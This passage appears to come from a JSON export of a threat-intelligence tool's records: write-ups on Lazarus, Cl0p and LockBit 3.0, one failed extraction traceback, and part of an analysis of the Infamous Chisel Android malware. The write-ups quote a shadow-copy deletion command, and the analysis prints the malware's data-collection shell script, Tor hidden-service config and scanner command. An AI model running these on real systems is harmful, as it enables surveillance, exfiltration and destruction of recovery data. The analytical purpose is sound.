\n\nNon-Standard Port (T1571): \n\nSome Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating \nport-protocol mismatches. \n\nProxy (T1090): \n\nLazarus Group utilizes multiple forms of proxy, including Internal Proxy, and External Proxy. \n\nBidirectional Communication (T1102.002): \n\nLazarus Group has used GitHub as C2, pulling hosted image payloads then committing command \nexecution output to files in specific directories. \n\nExfiltration: \n\nExfiltration Over Unencrypted Non-C2 Protocol (T1048.003): \n\nLazarus Group malware SierraBravo-Two generates an email message via SMTP containing information \nabout newly infected victims. \n\n \n \n \n \n \n \n \n \n\fExfiltration Over C2 Channel (T1041): \n\nLazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware. \n\nExfiltration to Cloud Storage (T1567.002): \n\nDuring Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to \nexfiltrate stolen data to Dropbox. \n\nImpact: \n\nData Destruction (T1485): \n\nLazarus Group has used a custom secure delete function to overwrite file contents with data from heap \nmemory. \n\nInternal Defacement (T1491.001): \n\nLazarus Group replaced the background wallpaper of systems with a threatening image after rendering \nthe system unbootable with a Disk Structure Wipe. \n\nDisk Wipe (T1561): \n\nLazarus Group wipes the compromised disks using the following sub-techniques: Disk Content Wipe \n(T1561.001), Disk Structure Wipe (T1561.002). \n\nService Stop (T1489): \n\nLazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users. \nSystem Shutdown/Reboot (T1529): \n\nLazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems. \n\nConsequences: \n\nService Loss \n\nData Loss \n\n \n \n \n \n \n \n \n \n\fData Termination \n\nFinancial Loss \n\nIoCs (Behaviors): \n\nUnauthorized Account Access \n\nUnauthorized Creation of Administrative Accounts \n\nUnauthorized Connections to System Networks \n\nModifications to Registry Keys \n\nModifications to the Startup Folder \n\nModifications to the System Kernel \n\nMalicious Traffic \n\nCompromise of the Log4j Vulnerability \n\nMitigation: \n\nMonitor and Secure System Networks \n\nMonitor and Secure Active Directories \n\nRoutinely Train and Test Staff on Internet Security \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\fFollow NIST standards on Password Safety \n\nDo NOT Grant Privileges Unnecessarily \n\nCreate Secure Group Policies \n\nResources: \n\nLazarus is a State-Sponsored threat group. They have proven to have sufficient funds and have gained \nmany more through the theft of funds via cybercrime. \n\nThreat Score: 3 \n\nOpportunity: 3 \n\nDue to sufficient funds and demonstrated capabilities, Lazarus has significant opportunities to exploit \nattack vectors. \n\nConsequences: 3 \n\nThe consequences of a successful attack range from severe to catastrophic. \n\nMitigation: 3 \n\nIt takes significant resources to mitigate an attack from Lazarus. \n\n \n \n \n \n \n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-08-30T18:08:21.302Z"
  },
  "added_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64ef9da8638ee135e1dcb3ce"
  },
  "name": "Akira Ransomware Targets Cisco ASA",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Hacking campaign bruteforces Cisco VPNs to breach networks.pdf",
  "file_size": "71 KB",
  "content": null,
  "status": "FAILED TO EXTRACT",
  "report_type": "FILE",
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 58, in extract_pdf\n    results = self.__generate_openAI_analysis(reports=[report])\n              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 165, in __generate_openAI_analysis\n    response = chat_completion_feature_extractor.extract_features()\n               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/threat_analysis/chat_completion_feature_extractor.py\", line 37, in extract_features\n    responses = self._generate_responses(prompt1)\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/workspace/services/threat_analysis/chat_completion_feature_extractor.py\", line 62, in _generate_responses\n    for i, substring in enumerate(self.report_substrings):\n                                  ^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'ChatCompletionFeatureExtractor' object has no attribute 'report_substrings'\n",
  "added_on": {
    "$date": "2023-08-30T19:51:04.590Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64efa34f638ee135e1dcb3cf"
  },
  "name": "CIOp",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Cl0p Original Report.pdf",
  "file_size": "173 KB",
  "content": "Cl0p \n\nThreat Group Overview \n\nClop ransomware, used by different threat groups, has shown its ability to change and adjust \nover time. In 2021, an important arrest revealed the extensive network connected to this \nransomware, uncovering its larger influence than previously understood. Moreover, Clop \nconsistently targets crucial sectors such as healthcare, finance, technology, cybersecurity, and \nresearch labs. Known for its complexity, Clop uses seven defense evasion techniques, which \ncontribute to its significant impact and ongoing success. \n\nSources \n\nMicrosoft Threat Intelligence \n\nTrendMicro \n\nBleepingComputer \n\nmalpedia \n\nMitre ATT&CK \n\nIntent \n\nFrom TrendMicro: \n\nIn February 2019, security researchers discovered the use of Clop by the threat group known as \nTA505 when it launched a large-scale spear-phishing email campaign. \n\nIn 2020, it was reported that FIN11  a financially motivated hacking group  deployed Clop \nransomware and threatened their victims to publish exfiltrated data. \n\nIn concerted efforts to dismantle ransomware cartels, a global coalition across five continents \nthat involved law enforcement and private partners led to the arrests in Ukraine of six suspected \nClop members in June 2021. \n\nIt has gained infamy for compromising high-profile organizations in various industries \nworldwide using multilevel extortion techniques that resulted in huge payouts estimated at \nUS$500 million as of November 2021. \n\n\fResearchers also discovered that Clop targets a victims entire network instead of just individual \ncomputers. This is made possible by hacking into the Active Directory (AD) server before the \nransomware infection to determine the systems Group Policy. This allows the ransomware to \npersist in the endpoints even after incident responders have already cleaned them up. \n\nWhile other known RaaS operators claim to avoid the healthcare sector as a target out of \nhumanitarian consideration, our detections reveal that this is not the case for Clop, as this sector \nreceived the highest number of detections at 959, followed by the financial industry at 150. \n\nOur detections reveal that the US had the largest number of attack attempts at 2,214 followed by \nSpain at a distant second with 505 attempts. \n\nFrom BleepingComputer: \n\nClop's most targeted sector was the industrial sector, with 45% of Clop ransomware attacks \nhitting industrial organizations and 27% targeting tech companies. \n\nThe list of companies that had their Accellion FTA servers hacked by Clop includes, among \nothers, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple \nuniversities worldwide (the University of Colorado, University of Miami, Stanford Medicine, \nUniversity of Maryland Baltimore (UMB), and the University of California.) \n\nFrom Microsoft Threat Intelligence, October 27, 2022: \n\nFrom a Raspberry Robin infection, the DEV-0950 activity led to Cobalt Strike hands-on-\nkeyboard compromises, sometimes with a Truebot infection observed in between the Raspberry \nRobin and Cobalt Strike stage. The activity culminated in deployments of the Clop ransomware. \n\nMotivation \n\nCl0p is a financially motivate threat. \n\nTarget(s): \n\n  Private/Public Businesses \n  Healthcare \n  Critical Infrastructure \n\nOpportunity: \n\n  Raspberry Robin malware as deployment \n  Active Directory \n\n\f  Spear-phishing emails \n\nCapabilities (TTPs) \n\nExecution \n\nNative API (T1106): \n\nClop has used built in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), \nWNetCloseEnum(), GetProcAddress(), and VirtualAlloc(). \n\nCommand and Scripting Interpreter: Windows Command Shell (T1059.003): \n\nClop can use cmd.exe to help execute commands on the system. \n\nDefense Evasion \n\nDeobfuscate/Decode Files or Information (T1140): \n\nClop has used a simple XOR operation to decrypt strings. \n\nModify Registry (T1112): \n\nClop can make modifications to Registry keys. \n\nImpair Defenses: Disable or Modify Tools (T1562.001): \n\nClop can uninstall or disable security products. \n\nVirtualization/Sandbox Evasion: Time Based Evasion (T1497.003): \n\nClop has used the sleep command to avoid sandbox detection. \n\nObfuscated Files or Information: Software Packing (T1027.002): \n\nClop has been packed to help avoid detection. \n\nSubvert Trust Controls: Code Signing (T1553.002): \n\nClop can use code signing to evade detection. \n\nSystem Binary Proxy Execution: Msiexec (T1218.007): \n\n\fClop can use msiexec.exe to disable security tools on the system. \n\nDiscovery \n\nFile and Directory Discovery (T1083): \n\nClop has searched folders and subfolders for files to encrypt. \n\nNetwork Share Discovery (T1135): \n\nClop can enumerate network shares. \n\nProcess Discovery (T1057): \n\nClop can enumerate all processes on the victim's machine. \n\nSoftware Discovery: Security Software Discovery (T1518.001): \n\nClop can search for processes with antivirus and antimalware product names. \n\nSystem Location Discovery: System Language Discovery (T1614.001): \n\nClop has checked the keyboard language using the GetKeyboardLayout() function to avoid \ninstallation on Russian-language or other Commonwealth of Independent States-language \nmachines; it will also check the GetTextCharset function. \n\nImpact \n\nData Encrypted for Impact (T1486): \n\nClop can encrypt files using AES, RSA, and RC4 and will add the \".clop\" extension to encrypted \nfiles. \n\nInhibit System Recovery (T1490): \n\nClop can delete the shadow volumes with vssadmin Delete Shadows /all /quiet and can use \nbcdedit to disable recovery options. \n\nService Stop (T1489): \n\nClop can kill several processes and services related to backups and security solutions. \n\nConsequences: \n\n\f  Financial Loss \n \n  Possible Termination of Data \n\nInterruption of Service \n\nIoCs (Behaviors): \n\n  Unauthorized directory scans \n  Unauthorized registry modifications \n  Large amounts of data being exfiltrated to C2 servers \n\nMitigation: \n\n  Use up-to-date security to recognize and alert unauthorized registry modifications. \n  Routinely train and test staff on internet security. \n  Routinely backup data. \n  Have strict group policies. \n  Monitor active directories. \n  Auditing Remote Access Tools. \nImplement Application Controls. \n \n  Restrict the use of PowerShell. \n  REview Domain Controllers, Servers, Workstations, and Active Directories. \n \n  Disable receiving hyperlinks in emails. \n  Label external emails. \n\nIf possible implement time-based access for user accounts. \n\nResources \n\nThe groups that have deployed Clop have extracted large amounts of money, so it is reasonable \nto assume that they have decent resources. \n\nThreat Score: 3 \n\nOpportunity: 3 \n\nCl0p has sufficient resources and a volatile ransomware giving it access to a variety of attack \nvectors. \n\nConsequences: 3 \n\nThe consequences can range between severe and catastrophic. Loss of data, interruption of \nservices, and a history of serious financial impact make this a formidable threat. \n\n\fMitigation: 3 \n\nIt demands a high amount of resources to mitigate the effect of Cl0p ransomware. \n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-08-30T20:15:11.225Z"
  },
  "added_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64efb2ce971bd398a8b674fb"
  },
  "name": "LockBit3.0",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "LockBit 3.0 Original Report.pdf",
  "file_size": "172 KB",
  "content": "LockBit 3.0 (Ransomware) \n\nThreat Group Overview: \n\nLockBit 3.0 was first released in 2019 and claims to be the most stable ransomware in the world. \nThe group targets both high-profile entities within critical infrastructure and conventional \nsectors, aiming to establish a strong reputation. Their operations have resulted in significant \nfinancial gains, accumulating millions of dollars. \n\nSources: \n\nCyberwire \n\nFortinet \n\nGBHackers \n\nHackRead \n\nIndustrial Cyber \n\nLoginSoft Research \n\nTidal Cyber \n\nJoint Cybersecurity Advisory \n\nIntent: \n\nFrom GBHackers: \n\nA significant Indian lending organization Fullerton India was breached at the beginning of \nApril 2023. \n\nThe LockBit ransomware Darknet blog, where hackers listed the business and have since \nreleased all the hacked information, confirms it. \n\nAccording to reports, on May 3, 2023, the LockBit 3.0 ransomware group exposed more than \n600 GB of crucial data belonging to Fullerton, India, and its clients on the dark web. \n\n\fLockBit 3.0 demanded a ransom of $29,999,99, or Rs. 24 crores, to erase the compromised data. \nThe hackers also stated that the company could postpone the deadline for $1,000 every day. \n\nFrom FortiGuard Labs by Fortinet: \n\nLockBit 3.0, also known as LockBit Black, operates a Ransomware-as-a-Service (RaaS) service \nand employs a double-extortion tactic to get victims to pay ransom. \n\nPrior to the file encryption routine, attackers exfiltrate information using custom and dual-use \ntools such as Stealbit and rclone, and publicly available file sharing services. \n\nFurthermore, LockBit 3.0 deletes shadow copies to prevent file recovery and replaces desktop \nwallpaper with its own. \n\nThe ransomware stops its operation if a compromised machine's language setting is set to \npredefined languages such as Russian, Armenian, Belarusian, Georgian and Ukrainian. \n\nFrom Industrial Cyber: \n\nSince January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates \ndeploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and \ncritical infrastructure organizations, which can make effective computer network defense and \nmitigation challenging, the joint advisory released Thursday said. \n\nThe hackers pressure victims to pay by threatening to publish the stolen data if they do not pay \nthe ransom. \n\nThe IC3 report comes in the wake of the cyber landscape providing ample opportunities for \ncriminals and adversaries to target U.S. networks, attack critical infrastructure, hold money and \ndata for ransom, facilitate large-scale fraud schemes, and threaten national security. \n\nLockBit 3.0 is configured upon compilation with many different options that determine the \nbehavior of the ransomware. Upon the actual execution of the ransomware within a victim \nenvironment, various arguments can be supplied to further modify the behavior of the \nransomware. \n\nLockBit 3.0 will only infect machines that do not have language settings matching a defined \nexclusion list. \n\nThe agencies determined that LockBit 3.0 attempts to spread across a victim network by using a \npreconfigured list of credentials hardcoded at compilation time or a compromised local account \nwith elevated privileges. \n\nLastly, LockBit 3.0 ranked third among the most prevalent ransomware groups in the quarter \naccording to the ransomware telemetry analysis gleaned from Trellixs global sensors. \n\n\fMotivation: \n\nLockBit 3.0 is financially motivated. \n\nTarget(s): \n\n  US Networks \n  Critical Infrastructure \n  Financial Institutions \n\nOpportunity \n\n  Public File Sharing Services \n  RaaS \n\nCapabilities (TTPs): \n\nExecution: \n\nWindows Command Shell (T1059.003): \n\nThe actor may use a BAT file to change passwords, copy files to C:\\ProgramData, sets \nSysInternals Autologon to automatically login without user interaction, and sets the next reboot \nin Safe Mode. \n\nVisual Basic (T1059.005): \n\nRegisters a new service that will run its VBS script. \n\nPython (T1059.006): \n\nThe python scripts main purpose is to execute BAT files. \n\nUser Execution - Malicious File (T1204.002): \n\nPost-boot runs malicious BAT scripts to extract the ransomware payload. \n\nPersistence: \n\nWinlogon Helper DLL (T1547.004): \n\n\fIf any part of the execution fails, it places a BAT file in the registry to run on logon via \nWinlogon. \n\n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-08-30T21:21:18.444Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-08-30T21:21:41.434Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f0e89f7b91c1f23e50f508"
  },
  "name": "Infamous Chisel Malware",
  "file_type": null,
  "website_url": "https://www.cisa.gov/news-events/analysis-reports/ar23-243a",
  "website_title": "Infamous Chisel Malware Analysis Report",
  "file_name": null,
  "file_size": null,
  "content": "An official website of the United States government     The UK National Cyber Security Centre (NCSC), the U.S. National Security Agency (NSA), U.S. Cybersecurity and Infrastructure Security Agency (CISA), U.S. Federal Bureau of Investigation (FBI), New Zealand’s National Cyber Security Centre (NCSC-NZ), the Canadian Centre for Cyber Security – part of the Canada’s Communications Security Establishment (CSE), and Australian Signals Directorate (ASD) are aware that the actor known as Sandworm has used a new mobile malware in a campaign targeting Android devices used by the Ukrainian military. The malware is referred to here as Infamous Chisel. Organizations from the United Kingdom, United States, Australia, Canada, and New Zealand have previously linked the Sandworm actor to the Russian GRU's Main Centre for Special Technologies GTsST. Download the PDF version of this report: PDF, 672 KB(link is external) For a downloadable copy of IOCs, see: Infamous Chisel is a collection of components which enable persistent access to an infected Android device over the Tor network, and which periodically collates and exfiltrates victim information from compromised devices. The information exfiltrated is a combination of system device information, commercial application information, and applications specific to the Ukrainian military. The malware periodically scans the device for information and files of interest, matching a predefined set of file extensions. It also contains functionality to periodically scan the local network collating information about active hosts, open ports, and banners. Infamous Chisel also provides remote access by configuring and executing Tor with a hidden service which forwards to a modified Dropbear binary providing a SSH connection. Other capability includes network monitoring and traffic collection, SSH access, network scanning, and SCP file transfer. Filename killer Description Infamous Chisel - Process manipulation for netd ELF 32-bit ARM Size 30160 bytes MD5 512eb94ee86e8d5b27ec66af98a2a8c4 SHA-1 ad6eb2a7096b0e29cd93b8b1f60052fed7632ab9 SHA-256 5866e1fa5e262ade874c4b869d57870a88e6a8f9d5b9c61bd5d6a323e763e021   Filename blob Description Infamous Chisel - Decompressor and launcher for Tor process ELF 32-bit ARM Size 2131691 bytes MD5 2cfa1f3e0467b8664cbf3a6d412916d6 SHA-1 b681a2b64d150a4b16f64455913fbacd97d9b490 SHA-256 2d19e015412ef8f8f7932b1ad18a5992d802b5ac62e59344f3aea2e00e0804ad   Filename ndbr_armv7l Description Infamous Chisel - Multi-call binary with many utilities: dropbear, dropbearkey, ssh, scp, nmap, dbclient, watchdog, rmflag, mkflag ELF 32-bit ARM Size 328296 bytes MD5 0905e83411c0418ce0a8d3ae54ad89a6 SHA-1 917db380b22fad02e7f21f11d1b4e8a5ad47c61c SHA-256 5c5323bd17fd857a0e77be4e637841dad5c4367a72ac0a64cc054f78f530ba37   Filename ndbr_i686 Description Infamous Chisel - Multi-call binary with many utilities: dropbear, dropbearkey, ssh, scp, nmap, dbclient, watchdog, rmflag, mkflag ELF 32-bit Intel 80386 Size 450340 bytes MD5 7e548ef96d76d2f862d6930dcc67ef82 SHA-1 7d11aefc26823712ad8de37489f920fae679b845 SHA-256 3cf2de421c64f57c173400b2c50bbd9e59c58b778eba2eb56482f0c54636dd29   Filename db Description Infamous Chisel - Multi-call binary with many utilities: dropbear, dropbearkey, ssh, scp, nmap, dbclient, watchdog, rmflag, mkflag ELF 32-bit ARM Size 5593884 bytes MD5 04d0606d90bba826e8a609b3dc955d4d SHA-1 ffaeba9a9fb4260b981fb10d79dbb52ba291fc94 SHA-256 338f8b447c95ba1c3d8d730016f0847585a7840c0a71d5054eb51cc612f13853   Filename db.bz2 Description Bzip compressed data containing the Infamous Chisel Multi-Call binary (db) Size 5593884 bytes MD5 c4b5c8bdf95fe636a6e9ebba0a60c483 SHA-1 cdad1bee2e88581b7fa7af5698293435667d2550 SHA-256 ef466e714d5250e934e681bda6ebdecd314670bb141f12a1b02c9afddbd93428   Filename td Description Standard Tor P2P network application – likely actor compiled ELF 32-bit ARM Size 5265772 bytes MD5 1f2c118b29e48cc5a5df46cddd399334 SHA-1 f6368ae2eec8cf46a7e88559f27dbbe4e7c02380 SHA-256 33a2be6638be67ba9117e0ac7bad26b12adbcdf6f8556c4dc2ff3033a8cdf14f   Filename td.bz2 Description Bzip compressed data containing the standard Tor P2P network application (td) Size 1840669 bytes MD5 452b6c35f44f55604386849f9e671cc0 SHA-1 2df1e320851b26947ab1ea07eaccbd4d3762c68e SHA-256 001208a304258c23a0b3794abd8a5a21210dfeaf106195f995a6f55d75ef89cd   Filename tcpdump Description Standard Tcpdump utility – likely actor compiled ELF 32-bit ARM Size 759528 bytes MD5 4bdf7f719651d9a762d90e9f33f6bb01 SHA-1 500b953d63a0dbdc76dc3f51c32e3acab92f3ddc SHA-256 140accb18ba9569b43b92da244929bc009c890916dd703794daf83034e349359 This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Tactic ID Technique Procedure Execution T1569(link is external) System Services Infamous Chisel - netd replaces the legitimate netd. Persistence T1398 (Mobile)(link is external) Boot or Logon Initialization Scripts Infamous Chisel - netd replaces the legitimate netd. Persistence T1625(link is external) (Mobile) Hijack Execution Flow Infamous Chisel - netd replaces the legitimate netd and is executed by init inheriting root privileges. Privilege Escalation   T1626 (Mobile)(link is external) Abuse Elevation Control Mechanism: Infamous Chisel - netd executes shell scripts as the root user of the device. Defense Evasion T1629 (Mobile)(link is external) Impair Defenses Infamous Chisel - netd checks that it is executed by init and at the path for the legitimate netd. Defense Evasion T1406 (Mobile)(link is external) Obfuscated Files or Information Infamous Chisel - blob decompresses executables from bzip archives. Credential Access T1557(link is external) Adversary-in-the-Middle Infamous Chisel - mDNSResponder is deployed alongside this malware and could potentially be used for DNS poisoning. Credential Access T1634 (Mobile)(link is external) Credentials from Password Stores Infamous Chisel - netd scrapes multiple files containing credentials and key information. Credential Access T1040(link is external) Network Sniffing Infamous Chisel - tcpdump is deployed alongside this malware and has the ability to sniff network interfaces and monitor network traffic. Discovery T1420 (Mobile)(link is external) File and Directory Discovery Infamous Chisel - netd enumerates multiple data directories to discover files of interest. Discovery T1430 (Mobile)(link is external) Location Tracking Infamous Chisel - netd collects GPS information. Discovery T1418 (Mobile)(link is external) Software Discovery Infamous Chisel - netd collects a list of installed packages. Discovery T1426 (Mobile)(link is external) System Information Discovery Infamous Chisel - netd collects various system information such as the Android ID and other hardware information. Discovery T1422 (Mobile)(link is external) System Network Configuration Discovery Infamous Chisel - netd collects IP interface configuration information. Discovery T1421 (Mobile)(link is external) System Network Connections Discovery Infamous Chisel - netd performs IP scanning of the local network to discover other devices. Collection T1533 (Mobile)(link is external) Data from Local System Infamous Chisel - netd automatically collects files from the local system based on a predefined list of file extensions. Collection T1074.001(link is external) Data Staged: Local Data Staging Infamous Chisel - netd creates multiple temporary files in the system to hold collected information. Collection T1114.001(link is external) Email Collection: Local Email Collection Infamous Chisel - netd exfiltrates files from application and data directories containing communication data. Command and Control T1473 (Mobile)(link is external) Application Layer Protocol: Infamous Chisel - db provides SCP functionality.   Command and Control T1521 (Mobile)(link is external) Encrypted Channel Infamous Chisel - td is deployed alongside this malware providing a Tor hidden service relaying connections to SSH program. Command and Control T1572(link is external) Protocol Tunnelling Infamous Chisel - td is deployed alongside this malware providing a local Socks connection for db. Command and Control T1219(link is external) Remote Access Software Infamous Chisel - db provides a SSH server and client. Exfiltration T1020(link is external) Automated Exfiltration Infamous Chisel - netd automatically exfiltrates files at regular intervals. Exfiltration T1029(link is external) Scheduled Transfer Infamous Chisel - netd automatically exfiltrates files at regular intervals. Impact T1489(link is external) Service Stop Infamous Chisel – netd replaces the legitimate netd. Infamous Chisel is a collection of multiple components. For netd, killer, blob, and td functionality can be extrapolated from references between them. The function of other binaries changes depending on the command line parameters that are supplied. It is likely that interaction takes place over the SSH remote shell connection configured by netd. Filename Description netd This component is used to perform automated device information collection and exfiltration. killer This component kills the malicious netd process. blob This component is executed by netd and is responsible for configuring and executing the Tor utility td. td This utility is Tor with no obvious modifications. tcpdump This utility is tcpdump with no obvious modifications. ndbr_armv7l ndbr_i686 These utilities are multi-call containing: dropbear, dropbearkey, ssh, scp, nmap, dbclient, watchdog, rmflag, mkflag. dropbear has been modified as described in the section Mutli-call binaries (Dropbear function modifications). ARM and x86 variants. db This utility is multi-call containing: dropbear, dropbearkey, ssh, scp, nmap, dbclient, watchdog, rmflag, mkflag. dropbear has been modified as described in the section Mutli-call binaries (Dropbear function modifications). netd is designed to persist on the system by replacing the legitimate netd system binary at the path /system/bin/netd. This replacement is not carried out by the malware, but it can be extrapolated from the checks that it carries out. This is the only Infamous Chisel component which persists. When the malicious netd is executed, it will check if init is the parent process which executed it. This parent process is responsible for creating the processes listed in the script init.rc. The malicious replacement netd when executed in this way will fork and execute the legitimate process backed up at the path /system/bin/netd_ passing through the command line parameters. This retains the normal functionality of netd, while allowing the malicious netd to execute as root. This replacement would require an escalated privilege level to perform. If it doesn’t find itself at the /system/bin/netd path, it will fork and set its parent process ID to 1, also attempting to kill the legitimate netd process. The netd component of Infamous Chisel provides the bulk of the custom functionality which the actor deploys. The main purpose of netd is to collate and exfiltrate information from the compromised device at set intervals. It uses a combination of shell scripts and commands to collect device information. It also searches multiple directories to which files matching a predefined set of extensions are exfiltrated. All file exfiltration is performed as detailed in the Communications (File exfiltration) Section of this report. Whenever a file is selected for exfiltration, it is MD5-hashed and cross-referenced with a list of previously sent file hashes held in a file at one of three locations supporting different Android versions. The first existing directory path will be used: The file exfiltration is considered complete when the server sends Success anywhere in its response. As this exfiltration uses a Hypertext Transfer Protocol (HTTP) POST, this server response is also expected to be HTTP, but this is not explicitly checked for. The 16 raw bytes of the MD5 are appended to the end of the .google.index file, ensuring that the same file isn’t sent multiple times. As the .google.index file contains raw bytes, without prior knowledge, it would appear to contain random data. The initial allocation size is 256 Kb filled with NULLs providing space for up to a maximum of 16,384 file hashes. All hash entries will be checked for every file prior to exfiltration. When the end of the .google.index file is reached, the position is reset to the start, overwriting the previous hashes. This means if the number of files to exfiltrate from the device exceeds 16,384, files will be sent multiple times. On execution, the Infamous Chisel netd component enters a main loop that executes indefinitely where various timers trigger the execution of different tasks. All timer actions are executed immediately on first execution, and then at the specific intervals. Every 86,000 seconds (23 hours, 53 minutes, and 20 seconds) the following actions are performed: 1. File exfiltration from data directories The following directories are recursively searched for files matching the extensions listed. When a file is found by this search, it is exfiltrated as detailed in the Communications (File exfiltration) Section of this report. File extension list: Directory list: Along with other military specific application directories. 2. Information collection script An information collection script collates various hardware configuration information about the device. The script is written to the location: /data/local/tmp/.android.cache.sh and then executed by netd using the command /system/bin/sh -c /data/local/tmp/.android.cache.sh .android.cache.sh contains the following shell script: #!/system/bin/sh system/bin/settings get secure android_id > /data/local/tmp/.aid.cache system/bin/ip a > /data/local/tmp/.syscache.csv system/bin/pm list packages > /data/local/tmp/.syspackages.csv system/bin/getprop > /data/local/tmp/.sysinfo.csv Command Description Output filename settings get secure android_id Returns a hexadecimal string identifying the device uniquely. .aid.cache ip a Lists networking information such as IP address, subnet and interface type on a per network interface basis. .syscache.csv pm list packages List of installed applications on the device. .syspackages.csv getprop Lists various device hardware information such as GPS, battery, manufacturer and language. .sysinfo.csv All the information is written to the various files in the /data/local directory and exfiltrated, with the exception of the .aid.cache file. The android_id contained within this file is used to form part of the Uniform Resource Identifier (URI) detailed in the Communications Section of this report. 3. File exfiltration from application directories The /data/ directory is searched for the application directories: Along with some military application specific directories. Every file in these directories regardless of type is exfiltrated. 4. Specific file exfiltration The following files at the absolute paths are exfiltrated: Along with some military application specific directories. The files with the extension .csv are generated by the malware. The others are application specific files or system configuration information. Every 600 seconds (10 minutes) the following directories are searched for files of type .json or .json.bak which are then immediately exfiltrated: Along with some military application specific directories. Every 172,000 seconds (1 day, 23 hours, 46 minutes, and 20 seconds) the local area network is scanned. netd has a built-in network scanner that is executed by the command line: netd minmap -i any -noping -o /data/local/tmp/.ndata.tmp/ The ping scanner is fairly simplistic and will iterate over the available host IP addresses in the subnet specified by the interface on all available Transmission Control Protocol (TCP) ports. Internet Control Message Protocol (ICMP) scanning is disabled due to the noping command line parameter specified. The scanner also includes a HTTP GET request to elicit responses from ports running a HTTP server. The responses from other ports are also logged. Note: This information would facilitate lateral movement within the network and illustrates a clear intention to interact with other nearby hosts. On completion of this scan, the .ndata.tmp file is moved to the filename .ndata.csv in the same directory. This file is exfiltrated immediately, and both files removed from the tmp directory. The contents of this file will appear similar to: INTERFACE = eth0 SOURCE = 192.168.0.2 IP begin = 192.168.0.0 IP end = 192.168.0.255 PORTS = PING off SCAN tcp *******start*scan********   Host 192.168.0.0: Host 192.168.0.1: tcp - 135:[ tcp - 139:[ tcp - 443:[ tcp - 445:[ Host 192.168.0.2: Host 192.168.0.3: Host 192.168.0.4: <Remaining hosts omitted for brevity> The following command line parameters are present, but only a small portion is used: -ip, -p, -o, -i, -noping, -udp, -n, -s, -t, -c, -h, --help Command line help is also included: Usage minmap -ip* <ip-addr: 192.168.0.1/ip-range: 192.168.0.0/24> -p* <port: 80/port-range: 22,25-125/top> -udp <default tcp> -noping <default yes> -o <out_file> -t <timeout> <-n> -c <try_count> -s <source ip> -i <interface/any> <-h/--help (print this help) The td utility provides Tor directory services and is compiled for ARM with no obvious modifications. The configuration for this is generated by the blob component, used for Tor management, described in the Components (blob) section, and saved at the path /data/local/prx.cfg. This file contains:   SocksPort 127.0.0.1:1129 PreferSOCKSNoAuth%sExitPolicy reject *:* DataDirectory /data/local/prx/ RunAsDaemon 1 HiddenServiceDir /data/local/prx/hs/ HiddenServicePort 34371 127.0.0.1:34371 This configuration provides a Socket Secure version 4 (SOCKS4) connection on the local port 1129 enabling the Tor network to be used. The blob component uses this for network connectivity checks. The hidden service port is set to 34371 with the directory for hidden service information being set to /data/local/prx/hs/. During the execution of td an .onion domain for a hidden service is randomly generated at the path /data/local/prx/hs/hostname which is then exfiltrated by netd. The db component performs further configuration detailed in the Multi-call binaries (Watchdog) section of this report to enable a SSH connection via this .onion domain. This gives the actor the ability to create an SSH session by connecting to the hidden service across Tor. The blob component is responsible for configuring Tor services and checking network connectivity. Every 15 seconds the tmp directory is checked for the blob utility, and if found, it is moved to the /data/local directory from the /data/local/tmp/blob directory, overwriting any existing version. Every 6,000 seconds (1 hour and 40 minutes) blob is then run from the /data/local directory. netd executes blob which is responsible for configuring and executing Tor services provided by td. When run, it performs the following actions: The tcpdump utility (version 4.1.1) is compiled for ARM with no obvious modifications. This provides traffic capturing and monitoring functionality via the command line. The db utility contains multiple individual utilities which are selected based on the command line parameters supplied: Utility Actor Modified Description dropbear No Yes Dropbear SSH client with modified authentication functions as described in ‘Components (Multi-call binaries: db, NDBR_armv7l and NDBR_i686)’ dropbearkey No No Generates SSH keys nmap Yes No Network scanning and mapping utility which appears to be actor developed, as opposed to the open source Nmap project scp No No File-copying utility watchdog Yes N/A Creates directories, flag file and sets up the IP Tables rules rmflag Yes N/A Removes the flag file mkflag Yes N/A Creates directories The command line help for dropbear, dropbearkey, nmap and scp can be found in the Appendix Section of this report. dropbear, present within db, provides secure shell access to the device via the Tor hidden service. IP Tables rules configured allow incoming TCP connections destined 